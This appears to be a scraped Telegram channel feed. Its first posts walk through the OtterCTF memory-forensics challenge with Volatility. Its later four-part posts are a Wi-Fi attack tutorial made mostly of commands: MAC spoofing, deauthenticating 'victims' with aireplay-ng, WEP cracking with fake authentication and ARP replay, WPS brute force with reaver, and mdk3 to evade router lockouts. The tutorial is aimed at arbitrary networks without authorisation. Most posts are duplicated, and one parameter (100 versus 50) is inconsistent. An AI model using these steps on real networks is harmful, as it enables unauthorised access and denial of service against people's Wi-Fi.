Forwarded from Team ETF (ᴵ ᵃᵐ ᵍʳᵒᵒᵗ)
Ok hold your beers 🍻 guyz,
If you are following otterctf no worries,
If not I will begin with the question too.
1. In the above given dump file ( otterctf.vmem)
The user used to play a online game, and u need to find the game name and it's server ip address.
How will u do, think?
Answer:-
Do netscan using volatility
If you are following otterctf no worries,
If not I will begin with the question too.
1. In the above given dump file ( otterctf.vmem)
The user used to play a online game, and u need to find the game name and it's server ip address.
How will u do, think?
Answer:-
Do netscan using volatility
Forwarded from Team ETF (ᴵ ᵃᵐ ᵍʳᵒᵒᵗ)
3. There's a malware in the dump file, now you need to track the malware.
Let's begin
Normally hackers make the malware to run in background, so let's check if there's any hidden processes using psxview plugin.
In most cases, both pslist and psscan will show False for malware, but here some special case😑
Let's begin
Normally hackers make the malware to run in background, so let's check if there's any hidden processes using psxview plugin.
In most cases, both pslist and psscan will show False for malware, but here some special case😑
Forwarded from Team ETF (Groot)
4. So let's use pstree plugin, which will show the running process in tree format.
And here we can see 2 suspicious process ( guessing as it might be malware )
Vmware-tray
Rick and monty
Because pid of Rick and monty matches with ppid of vmware-tray.
Pid - process id
Ppid - parent Pid
Vmware-tray is common process in vmwares . Name doesn't look suspicious.
Let's check where the file exists.
And here we can see 2 suspicious process ( guessing as it might be malware )
Vmware-tray
Rick and monty
Because pid of Rick and monty matches with ppid of vmware-tray.
Pid - process id
Ppid - parent Pid
Vmware-tray is common process in vmwares . Name doesn't look suspicious.
Let's check where the file exists.
Forwarded from Team ETF (Groot)
5. Let's use filescan module to check where does that actual file exists.
Now we can see that the file doesn't in vmware directory at all. It's in the most common malware directory "tmp".
Now it's sure that it is a virus.
To make sure 100% , dump that file to your device and scan it in the virus total. ( use dumpmem plugin or any suitable to dump ) .
Now we can see that the file doesn't in vmware directory at all. It's in the most common malware directory "tmp".
Now it's sure that it is a virus.
To make sure 100% , dump that file to your device and scan it in the virus total. ( use dumpmem plugin or any suitable to dump ) .
Forwarded from Team ETF (ᴵ ᵃᵐ ᵍʳᵒᵒᵗ)
Shall I make this channel private.
All contents posted here are unique from any other channels in telegram.
All contents posted here are unique from any other channels in telegram.
Anonymous Quiz
67%
Yes
33%
No
Forwarded from Team ETF (ᴵ ᵃᵐ ᵍʳᵒᵒᵗ)
Have a look at our "Team ETF" Channel reviews,
@Team_Etf_reviews
For any queries / doubts contact
@Etf_Zan_bot ( fast reply )
@Zincster ( slow 😐 )
@Team_Etf_reviews
For any queries / doubts contact
@Etf_Zan_bot ( fast reply )
@Zincster ( slow 😐 )
Forwarded from Zincster
Part-01 :-
Wifi cracking :-
Requirements:-
1.Wifi adapter supporting monitor mode ( monitor mode is used to capture packets . Well, normal wifi adapter will be in managed mode in which we usually connect to other devices. )
2. Any OS ( but i recommend Kali linux)
Demonstration:-
To be safe, Change your adapter's Mac address
🧬ifconfig wlan0 down
🧬ifconfig wlan0 hw ether 11:22:33:44:55:66
🧬ifconfig wlan0 up
This method is same to change mac address of any interface ( like wlan0, eth0 etc..)
If you want to change other Mac address of eth0 just replace wlan0 by eth0
Here, first we stopped the interface .
hw -> hardware
And we gave the desired Mac address ( you any give any of 12 digits of same format ) .
And In next step we started the interface.
Monitor mode:-
As I told earlier, every adapter will be managed mode, so you need to change that mode to the monitor mode.
To do this we use airmon-ng
🧬airmon-ng check kill
🧬airmon-ng start wlan0
Now if you do ifconfig, wlan0 interface will get changed as mon0 or wlan0mon or by any other name.
Written by :- I am groot [ @Etf_Zan ]
Wifi cracking :-
Requirements:-
1.Wifi adapter supporting monitor mode ( monitor mode is used to capture packets . Well, normal wifi adapter will be in managed mode in which we usually connect to other devices. )
2. Any OS ( but i recommend Kali linux)
Demonstration:-
To be safe, Change your adapter's Mac address
🧬ifconfig wlan0 down
🧬ifconfig wlan0 hw ether 11:22:33:44:55:66
🧬ifconfig wlan0 up
This method is same to change mac address of any interface ( like wlan0, eth0 etc..)
If you want to change other Mac address of eth0 just replace wlan0 by eth0
Here, first we stopped the interface .
hw -> hardware
And we gave the desired Mac address ( you any give any of 12 digits of same format ) .
And In next step we started the interface.
Monitor mode:-
As I told earlier, every adapter will be managed mode, so you need to change that mode to the monitor mode.
To do this we use airmon-ng
🧬airmon-ng check kill
🧬airmon-ng start wlan0
Now if you do ifconfig, wlan0 interface will get changed as mon0 or wlan0mon or by any other name.
Written by :- I am groot [ @Etf_Zan ]
Forwarded from Zincster
Part-02 :-
Deauthentication :-
We use this trick to disconnect any user from the network.
First run
🧬airodump-ng wlan0mon
Now you can see the router's mac bssid and it's channel .
Now, to get all users in that wifi run,
🧬airodump-ng --channel [_] --bssid [_] wlan0mon
Now you can see all the users on that wifi,
Now use aireplay-ng to disconnect them,
🧬aireplay-ng --deauth 555555 -a [_] -c [_] wlan0mon
Here,
555555 is number of packets we are sending to the particular victim to disconnect them from router.
-a is router's bssid
-c is victim's Mac, which we got by running airodump-ng.
In case you want to disconnect all clients from the router, then
🧬aireplay-ng --deauth 55555555 -a [_] wlan0mon
This will disconnect all the clients.
But the effect will be less, means it may take some time to disconnect every client.
Written by :- I am groot [ @Etf_Zan ]
Deauthentication :-
We use this trick to disconnect any user from the network.
First run
🧬airodump-ng wlan0mon
Now you can see the router's mac bssid and it's channel .
Now, to get all users in that wifi run,
🧬airodump-ng --channel [_] --bssid [_] wlan0mon
Now you can see all the users on that wifi,
Now use aireplay-ng to disconnect them,
🧬aireplay-ng --deauth 555555 -a [_] -c [_] wlan0mon
Here,
555555 is number of packets we are sending to the particular victim to disconnect them from router.
-a is router's bssid
-c is victim's Mac, which we got by running airodump-ng.
In case you want to disconnect all clients from the router, then
🧬aireplay-ng --deauth 55555555 -a [_] wlan0mon
This will disconnect all the clients.
But the effect will be less, means it may take some time to disconnect every client.
Written by :- I am groot [ @Etf_Zan ]
Forwarded from Zincster
Part-03:-
WEP cracking :-
🧬airodump-ng wlan0mon
As we already know, we get all the router's available now,
🧬airodump-ng --bssid [_] --channel [_] --write trial
All the steps are same as I told earlier, one change here is we are writing the captured packets in trial file.
🧬aireplay-ng --fakeauth 0 -a [_] -h [_] wlan0mon
Here,
We are doing fake - authentication.
0 means authentication only once.
-a -> victim's bssid
-h -> your's bssid
🧬aireplay-ng --arpreply -b [_] -h [_] wlan0mon
After successfully authenticating with the target, we will wait to get the ARP packet, and we will inject that packet to the traffic.
You can see we didn't specify any number after --arpreply as we did earlier in --fakeauth . This is because, we want the process to repeat continuously till we get the enough number of IV's.
-b -> victim's bssid
-h -> your's bssid
IV -> random initialization vector to generate key streams
I forgot to tell earlier that, wep uses RC4 algorithm (24 bits) to encrypt the flow of data.
IV + key(password) = key_stream
Now key_stream will be added to the data to make it unreadable.
Now, we have the captured file (caplet) which we got in first step ( trial )
The file would be created as trial-01.cap
Now, crack it .
🧬aircrack-ng trial-01.cap
That's it , you will get the key after it has been cracked.
Remember , fake authentication method used for wep only.
Written by :- I am groot [ @Etf_Zan ]
WEP cracking :-
🧬airodump-ng wlan0mon
As we already know, we get all the router's available now,
🧬airodump-ng --bssid [_] --channel [_] --write trial
All the steps are same as I told earlier, one change here is we are writing the captured packets in trial file.
🧬aireplay-ng --fakeauth 0 -a [_] -h [_] wlan0mon
Here,
We are doing fake - authentication.
0 means authentication only once.
-a -> victim's bssid
-h -> your's bssid
🧬aireplay-ng --arpreply -b [_] -h [_] wlan0mon
After successfully authenticating with the target, we will wait to get the ARP packet, and we will inject that packet to the traffic.
You can see we didn't specify any number after --arpreply as we did earlier in --fakeauth . This is because, we want the process to repeat continuously till we get the enough number of IV's.
-b -> victim's bssid
-h -> your's bssid
IV -> random initialization vector to generate key streams
I forgot to tell earlier that, wep uses RC4 algorithm (24 bits) to encrypt the flow of data.
IV + key(password) = key_stream
Now key_stream will be added to the data to make it unreadable.
Now, we have the captured file (caplet) which we got in first step ( trial )
The file would be created as trial-01.cap
Now, crack it .
🧬aircrack-ng trial-01.cap
That's it , you will get the key after it has been cracked.
Remember , fake authentication method used for wep only.
Written by :- I am groot [ @Etf_Zan ]
Forwarded from Zincster
Part-04 :-
WPA / WPA2 cracking
( WPS enabled )
WPA -> TKIP encryption
WPA2 -> CCMP encryption
Remember the encryption used in WEP -> RC4 algorithm
To see all the wps enabled routers,
We use wash tool,
🧬wash -i wlan0mon
i -> interface
🧬aireplay-ng --fakeauth 100 -a [_] -h [_]
-a -> victim's Mac
-h -> your's Mac
You may get doubt, why we have used 50 here, that's because we need to associate with target network for every 50 seconds.
Now, to bruteforce we use tool called reaver,
🧬reaver --bssid [_] --channel [_] -i wlan0mon -A -N -vvv
-A -> we are telling to not to associate with the target.
-N -> we are telling for no-nacks to authenticate.
-vvv -> it's called verbose level,
If you have used nmap you will be well aware of this.
If some router's blocks you,
Means like in some websites login if you enter wrong passwords it will block you.
So for this, we will use tool called mdk3 which will use different Mac address while connection. ( like we use different VPN's to change our ip )
🧬mdk3 wlan0mon a -a [_]
a -> it is a test mode which is DOS mode here
-a -> victim's Mac
That's it.....
Written by :- I am groot [ @Etf_Zan ]
WPA / WPA2 cracking
( WPS enabled )
WPA -> TKIP encryption
WPA2 -> CCMP encryption
Remember the encryption used in WEP -> RC4 algorithm
To see all the wps enabled routers,
We use wash tool,
🧬wash -i wlan0mon
i -> interface
🧬aireplay-ng --fakeauth 100 -a [_] -h [_]
-a -> victim's Mac
-h -> your's Mac
You may get doubt, why we have used 50 here, that's because we need to associate with target network for every 50 seconds.
Now, to bruteforce we use tool called reaver,
🧬reaver --bssid [_] --channel [_] -i wlan0mon -A -N -vvv
-A -> we are telling to not to associate with the target.
-N -> we are telling for no-nacks to authenticate.
-vvv -> it's called verbose level,
If you have used nmap you will be well aware of this.
If some router's blocks you,
Means like in some websites login if you enter wrong passwords it will block you.
So for this, we will use tool called mdk3 which will use different Mac address while connection. ( like we use different VPN's to change our ip )
🧬mdk3 wlan0mon a -a [_]
a -> it is a test mode which is DOS mode here
-a -> victim's Mac
That's it.....
Written by :- I am groot [ @Etf_Zan ]